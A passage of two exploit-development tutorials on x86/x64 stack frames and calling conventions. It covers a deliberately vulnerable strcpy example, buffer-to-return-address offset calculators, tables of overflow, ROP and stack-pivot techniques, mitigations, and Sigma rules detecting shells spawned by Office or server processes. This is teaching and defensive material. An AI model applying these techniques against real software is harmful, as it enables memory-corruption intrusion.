RIP / EIP | Instruction pointer — saved as the return address by CALL |
RAX | Integer/pointer return value (XMM0 for floating-point) |
3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain
32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.
| Convention | Cleanup | Argument Passing |
|---|---|---|
__cdecl | Caller cleans | Right-to-left on stack |
__stdcall | Callee cleans | Right-to-left on stack (Win32 API) |
__fastcall | Callee cleans | First two in ECX/EDX, rest on stack |
__thiscall | Callee cleans | C++ this in ECX, args on stack |
x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.
// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
char buf[64]; // local buffer — classic overflow target
strcpy(buf, src); // bounded only by src
}; x86 frame for vuln(), high → low address
push ebp ; save caller's EBP
mov ebp, esp ; EBP anchors this frame
sub esp, 64 ; allocate buf[64]
; ... strcpy ...
; [EBP + 8] -> arg1 (src)
; [EBP + 4] -> return address ← ret-overwrite target
; [EBP + 0] -> saved EBP ← frame chain link
; [EBP - 64] -> buf ← overflow originA buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.

4. x64 Stack Frames: The Windows ABI and Shadow Space
The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0–XMM3. Additional arguments spill onto the stack.
Two rules dominate the x64 layout:
- Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump
RCX/RDX/R8/R9into this home space if it needs to spill them. - 16-byte alignment:
RSPmust be 16-byte aligned at aCALL. BecauseCALLpushes an 8-byte return address,RSPis16n+8before the call and16n-aligned on entry to the callee.
Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.
[High address — caller's frame]
Stack arg 5+ ← [RSP + 0x28+]
Shadow [R9] ← [RSP + 0x20]
Shadow [R8] ← [RSP + 0x18]
Shadow [RDX] ← [RSP + 0x10]
Shadow [RCX] ← [RSP + 0x08] (relative to callee entry)
Return Address ← [RSP + 0x00] ← ret-overwrite target
Local variables ← [RSP - N]
[Low address — grows downward]
5. Volatile vs. Non-Volatile Registers and Leaf Functions
The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.
| Class | Registers |
|---|---|
| Volatile (caller-saved) | RAX, RCX, RDX, R8–R11, XMM0–XMM5 |
| Non-volatile (callee-saved) | RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15 |
A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.
6. Prologue and Epilogue Deep Dive
The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.
; x86 epilogue
mov esp, ebp ; free locals
pop ebp ; restore caller's EBP
ret ; pop return address → EIPLEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.
; x64 MASM (ml64) non-leaf frame
sub rsp, 0x28 ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add rsp, 0x28 ; deallocate
ret ; pop return address → RIPMany optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address — offsets must be computed from RSP at a known instruction.
__declspec(noinline) int callee(int a, int b, int c, int d) {
int local = a + b + c + d; // forces a real frame + homing
return local;
}
int caller(void) { return callee(1, 2, 3, 4); }Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.
7. Unwind Data and Structured Exception Handling
x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.
typedef struct _RUNTIME_FUNCTION {
ULONG BeginAddress;
ULONG EndAddress;
ULONG UnwindData; // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.
8. Reading Stack Frames in a Debugger
In WinDbg or x64dbg you read the live frame directly off RSP.
bp mymodule!vuln ; break at the function
g ; run to it
dps rsp L10 ; dump 16 pointer-sized stack slots
r rsp, rbp, rip ; show live pointers
k ; walk the call stack (uses unwind data)dps rsp L10 prints the raw stack; the slot at [RSP+0x08] after entry (or the top after the prologue) holds the saved return address, which k resolves to module!function+offset. A return address that resolves to no module — or to the stack itself — is the first sign of a hijacked frame.
9. How Stack Overflows Corrupt Frame Integrity
Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.
# Conceptual layout arithmetic — NOT a payload.
# 64-byte buffer sitting below the saved return address.
import struct
buf_size = 64
saved_rbp = 8 # x86: 4
ret_addr_slot = 8 # x86: 4
offset_to_ret = buf_size + saved_rbp # bytes before reaching the return slot
print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.

10. Modern Mitigations and What They Change About the Layout
Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.
// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
char buf[64];
// prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
strcpy(buf, src);
// epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}| Mitigation | Structural Effect |
|---|---|
/GS stack cookie | __security_cookie placed between locals and saved return address; mismatch → __report_gsfailure |
| DEP / NX | IMAGE_DLLCHARACTERISTICS_NX_COMPAT; stack pages non-executable, blocking on-stack shellcode |
| ASLR | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE; randomizes stack/image base, breaking hardcoded addresses |
| Control Flow Guard | IMAGE_GUARD_CF_INSTRUMENTED; validates indirect call targets |
| Intel CET Shadow Stack | CETCOMPAT mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites |
11. Common Attacker Techniques
| Technique | Description |
|---|---|
| Saved return-address overwrite | Overflow a local buffer to replace [RSP+0x08]/[EBP+4] and redirect RET |
| Saved frame pointer overwrite | Corrupt saved RBP/EBP to desynchronize the frame chain or pivot |
| Stack pivot | Use a gadget (xchg rsp, rax; leave; ret) to point RSP at attacker data |
| ROP chaining | Defeat DEP by chaining ret-terminated gadgets via the corrupted stack |
| SEH overwrite (x86) | Corrupt the exception handler chain on the stack to gain control on fault |
| Off-by-one / frame-pointer overwrite | Single-byte overflow to truncate or shift EBP, shifting subsequent frame math |
These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.
12. Defensive Strategies & Detection
Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.
| Signal | Detail |
|---|---|
| Windows Error Reporting | Access violation at abnormal RIP; dumps under %LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue; Application Event 1000/1001 |
| Sysmon Event ID 1 | Unusual child process from document/browser renderers (T1203 follow-on) |
| Sysmon Event ID 10 | Cross-process stack reads via ReadProcessMemory |
| Security Event 4672 | Special privileges to an unexpected logon (T1068 follow-on) |
ETW Microsoft-Windows-Kernel-Process | Anomalous RIP/RSP deltas via call-stack sampling (stack pivot) |
ETW Microsoft-Windows-Security-Mitigations | Emits events when CFG, DEP, or Shadow Stack violations are blocked |
A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:
title: Suspicious Child Process From Document Renderer
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 1
ParentImage|endswith:
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\AcroRd32.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\wscript.exe'
condition: selection
level: highHardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.
13. MITRE ATT&CK Mapping
Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Sysmon EventID 1 renderer child chains; WER crash dumps |
| Exploitation for Privilege Escalation | T1068 | Security EventID 4672 unexpected source process |
| Exploit Public-Facing Application | T1190 | Service crash loops + WER on network-facing daemons |
| Reflective Code Loading | T1620 | ETW call-stack anomalies; non-image-backed RIP |
| Process Injection | T1055 | Sysmon EventID 8/10; abnormal cross-process access |
14. Tools for Stack Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Kernel/user debugging, k, dps, unwind walking | microsoft.com |
| x64dbg | Live user-mode stack inspection on x64/x86 | x64dbg.com |
| Godbolt Compiler Explorer | View prologue/epilogue and FPO across compilers | godbolt.org |
| Ghidra | Static reconstruction of frames and calling conventions | ghidra-sre.org |
| Process Hacker | Live thread stacks and call-stack walking | processhacker.sourceforge.io |
| NASM | Assemble illustrative prologue/epilogue snippets | nasm.us |
| GDB + pwndbg | Cross-platform frame and offset analysis | gdb.gnu.org |
Summary
- The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at
RET— which is why it is the primary target of memory-safety exploits. - x86 frames anchor on
EBPwith multiple calling conventions; x64 uses one convention,RCX/RDX/R8/R9parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing. - The prologue saves non-volatile registers and reserves locals; the epilogue (
LEAVE/RET) reverses it; frame-pointer omission removes the[EBP+4]anchor and forces RSP-relative offset math. - Overflows corrupt saved
RBP/EBPand the return address;/GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it. - Detect follow-on activity via WER dumps, Sysmon
EventID 1/10, Security4672, and ETW mitigation/call-stack events, mapped toT1203andT1068.
Related Tutorials
- Classic Stack Buffer Overflow: Smashing the Stack on Windows
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
References
- x64 ABI Conventions | Microsoft Learn
- Exploitation for Privilege Escalation (T1068) | MITRE ATT&CK
- Intel x86 Function-call Conventions – Assembly View | unixwiz.net
- ENTER — Make Stack Frame for Procedure Parameters (x86 Instruction Reference) | felixcloutier.com
- Windows x64 Calling Convention: Stack Frame | Red Team Notes (ired.team)
x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V
Objective: Understand how the five major calling conventions —
cdecl,stdcall,fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.
1. Why Calling Conventions Matter for Exploit Development
A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.
For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.
2. Stack Mechanics Refresher: PUSH, POP, CALL, RET
The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.
CALL targetpushes the return address (the next instruction’sEIP/RIP) onto the stack, then jumps.RETpops that saved address back into the instruction pointer.RET Npops the address and addsNtoESP— this is how a callee cleans caller-pushed arguments.
push arg1 ; arg on stack
call foo ; pushes return address, jumps to foo
add esp, 4 ; caller cleans 1 dword arg (cdecl)Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.
3. x86 cdecl: The C Standard
__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.
Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.
; foo(1, 2, 3); -- cdecl
push 3 ; rightmost first
push 2
push 1 ; leftmost last
call _foo
add esp, 12 ; CALLER cleans 3 dwordsCanonical x86 stack frame at function entry (high → low address):
[arg N] ← pushed last (rightmost)
[arg 2]
[arg 1] ← pushed first
[return address] ← pushed by CALL
[saved EBP] ← pushed by prologue (PUSH EBP)
[local vars] ← ESP after SUB ESP, NThe saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.

4. x86 stdcall: The Windows API Convention
__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.
Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.
; foo(1, 2); -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
; ... body ...
ret 8 ; CALLEE pops 8 bytes of argsFor shellcode and custom loaders, the @N suffix matters when resolving and patching the Import Address Table — the decorated name must match the export.
5. x86 fastcall: Register-Based Argument Passing
__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.
; foo(1, 2, 3); -- MSVC fastcall
mov ecx, 1 ; arg1 in ECX
mov edx, 2 ; arg2 in EDX
push 3 ; arg3 on stack
call @foo@12⚠️ Compiler variance:
__fastcallis not standardized across compilers. MSVC usesECX/EDX. Borland passes the first three arguments inEAX,EDX,ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s__fastcalllabel.
6. Microsoft x64 ABI: The Modern Windows Convention
On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:
| Argument slot | Integer register | Float register |
|---|---|---|
| 1 | RCX | XMM0 |
| 2 | RDX | XMM1 |
| 3 | R8 | XMM2 |
| 4 | R9 | XMM3 |
Key rules:
- One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
- Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
- Arguments beyond the first four go on the stack after the shadow space.
- The stack must be 16-byte aligned before
CALL. - The x87 stack is unused; all floating-point work uses the 16 XMM registers and is volatile across calls.
Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.
; foo(a, b, c, d) -- Microsoft x64
mov rcx, a
mov rdx, b
mov r8, c
mov r9, d
sub rsp, 20h ; 32 bytes shadow space (caller's job)
call foo
add rsp, 20h ; reclaim shadow spaceVolatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM4, XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15.

7. System V AMD64 ABI: The Linux and macOS Convention
System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:
| Argument slot | Integer register | Float register |
|---|---|---|
| 1 | RDI | XMM0 |
| 2 | RSI | XMM1 |
| 3 | RDX | XMM2 |
| 4 | RCX | XMM3 |
| 5 | R8 | XMM4–XMM7 (5–8) |
| 6 | R9 |
Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.
- Callee-saved:
RBX,RBP,R12–R15. All others are caller-saved. - Red zone: the 128 bytes below
RSPare reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjustingRSP. - Syscall variant: kernel entry uses the same registers except
R10replacesRCX(because thesyscallinstruction clobbersRCX). - Varargs: for variadic functions,
RAXmust hold the number of vector (XMM) registers used, 0–8.
; write(1, buf, len) via syscall -- System V
mov rax, 1 ; sys_write
mov rdi, 1 ; fd (arg1)
mov rsi, buf ; buffer (arg2)
mov rdx, len ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)⚠️ Shadow space vs. red zone are mutually exclusive and commonly confused. Shadow space (32 bytes above the call) exists only on Windows x64. The red zone (128 bytes below
RSP) exists only on System V. Never assume both.

8. Side-by-Side Comparison and ABI Detection in Disassembly
| Property | Microsoft x64 | System V AMD64 |
|---|---|---|
| Integer arg registers | RCX, RDX, R8, R9 | RDI, RSI, RDX, RCX, R8, R9 |
| FP arg registers | XMM0–XMM3 | XMM0–XMM7 |
| Shadow space | 32 bytes (mandatory) | None |
| Red zone | None | 128 bytes below RSP |
| Callee-saved | RBX, RBP, RDI, RSI, R12–R15, XMM6–15 | RBX, RBP, R12–R15 |
Recognition heuristics in IDA/Ghidra:
- A
sub rsp, 0x20immediately beforeCALLand arguments loaded intoRCX/RDX/R8/R9⇒ Microsoft x64. - Arguments loaded into
RDI/RSI/RDXand writes into[rsp-8]without a priorsub rsp⇒ System V (red zone). - A
ret N(non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments inECX/EDXdistinguish fastcall. - A bare
retwith caller-sideadd esp, N⇒ cdecl.
Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.
9. Calling Conventions as an Attack Surface
Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.
In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.
On Windows x64, the mandatory 32-byte shadow space shifts the offset from a local buffer to the saved return address by 32 bytes versus an equivalent Linux frame — a classic source of off-by-32 errors in cross-platform shellcode.
A conceptual offset calculator makes the dependency explicit:
def return_addr_offset(buf_size, conv):
# bytes from start of local buffer to the saved return address
if conv == "x86_cdecl" or conv == "x86_stdcall":
return buf_size + 4 # + saved EBP (4 bytes)
if conv == "sysv_amd64":
return buf_size + 8 # + saved RBP (8 bytes)
if conv == "ms_x64":
return buf_size + 8 + 0x20 # saved RBP + 32B shadow space
raise ValueError("unknown convention")Frame-pointer presence (-fomit-frame-pointer removes saved RBP) and shadow space both change the answer — which is why convention awareness precedes any reliable payload.

10. Common Attacker Techniques
| Technique | Description |
|---|---|
| Saved return-address overwrite | Overflow a local buffer to clobber the convention-determined return slot |
| Return-to-libc (x86) | Stack-arranged args (cdecl) let an attacker call system() without shellcode |
| ROP register loading (x64) | Use pop rdi ; ret / pop rcx ; ret gadgets to satisfy the ABI before a call |
| Shadow-space-aware stack pivot | Account for the 32-byte home space when chaining Windows x64 gadgets |
| IAT patching via decoration | Resolve _func@N decorated stdcall imports for shellcode loaders |
| Reflective API calls | Manually set up RCX/RDX/R8/R9 + shadow space before invoking LoadLibraryA |
Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.
11. Defensive Strategies & Detection
Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.
Compile-time mitigations motivated directly by convention layout:
- Stack canaries —
/GS(MSVC),-fstack-protector-strong(GCC/Clang) detect return-address overwrite beforeRET. - Control Flow Guard —
/guard:cfvalidates indirectCALLtargets. - Intel CET / Shadow Stack — hardware enforces that
RETpops the addressCALLpushed, directly countering return-address overwrites. Mark binaries withIMAGE_DLLCHARACTERISTICS_GUARD_CET_COMPAT(0x4000). - ASLR + PIE — randomizes addresses so known layout still yields unknown absolute targets.
-mno-red-zone— hardens Linux kernel modules against red-zone clobbering.
Runtime telemetry for the exploitation aftermath:
- Sysmon Event ID 1 (Process Create) — anomalous children of network-facing services after a successful ROP/return-to-libc chain.
- Sysmon Event ID 10 (Process Access) —
VirtualAllocEx/WriteProcessMemoryfrom convention-correct injected shellcode. - Sysmon Event ID 7 (Image Load) — unexpected DLL loads from a corrupted return address redirecting into
LoadLibrary. - Microsoft-Windows-Threat-Intelligence ETW — kernel telemetry on
NtAllocateVirtualMemory/NtWriteVirtualMemory. - Audit Process Creation (Event
4688) with command-line logging.
title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 1
ParentImage|endswith:
- '\w3wp.exe'
- '\sqlservr.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
condition: selection
level: high12. Tools for Calling-Convention Analysis
| Tool | Description | Link |
|---|---|---|
| IDA Pro / Ghidra | Decompiler ABI inference and stack-frame reconstruction | ghidra-sre.org |
| x64dbg | Live register/stack inspection on Windows | x64dbg.com |
| GDB + pwndbg | Stack and register view on Linux (x/16gx $rsp) | gnu.org |
| WinDbg | Inspect shadow space and frame layout (dd rsp) | microsoft.com |
| Godbolt Compiler Explorer | Compare emitted asm across conventions/compilers | godbolt.org |
| ROPgadget / Ropper | Enumerate pop rdi ; ret-style register-loading gadgets | github.com |
| NASM | Hand-assemble convention test cases | nasm.us |
| Radare2 | Cross-platform disassembly and ABI heuristics | rada.re |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Crash telemetry, Event 4688 child-process anomalies |
| Exploit Public-Facing Application | T1190 | WAF/IDS, anomalous service children (Event ID 1) |
| Process Injection | T1055 | Sysmon Event ID 10 (VirtualAllocEx/WriteProcessMemory) |
| Process Injection: DLL Injection | T1055.001 | Event ID 7 unexpected LoadLibraryA loads |
| Command and Scripting Interpreter | T1059 | Event ID 1 cmd.exe/powershell.exe spawns |
| Reflective Code Loading | T1620 | ETW Threat-Intelligence memory-write telemetry |
ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.
Summary
- Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
- x86 splits into
cdecl(caller cleanup, variadics,_foo),stdcall(calleeRET N,_foo@N), andfastcall(ECX/EDX, MSVC-specific vs. Borland’sEAX/EDX/ECX). - The two 64-bit ABIs differ in argument registers (
RCX,RDX,R8,R9vs.RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets. - Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required —
pop rdi ; reton Linux, shadow-space accounting on Windows. - Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event
4688, hardened with canaries, CFG, and CET shadow stacks.
Related Tutorials
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- x86 and x64 Assembly from Scratch
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
References
- Calling Conventions (cdecl, stdcall, fastcall, and others) | Microsoft Learn
- x64 Calling Convention | Microsoft Learn
- x64 ABI Conventions (x64 Software Conventions) | Microsoft Learn
- System V Application Binary Interface AMD64 Architecture Processor Supplement (Official psABI PDF) | uclibc.org
- Calling Conventions for Different C++ Compilers and Operating Systems (Agner Fog) | agner.org
- x86 Disassembly/Calling Conventions | Wikibooks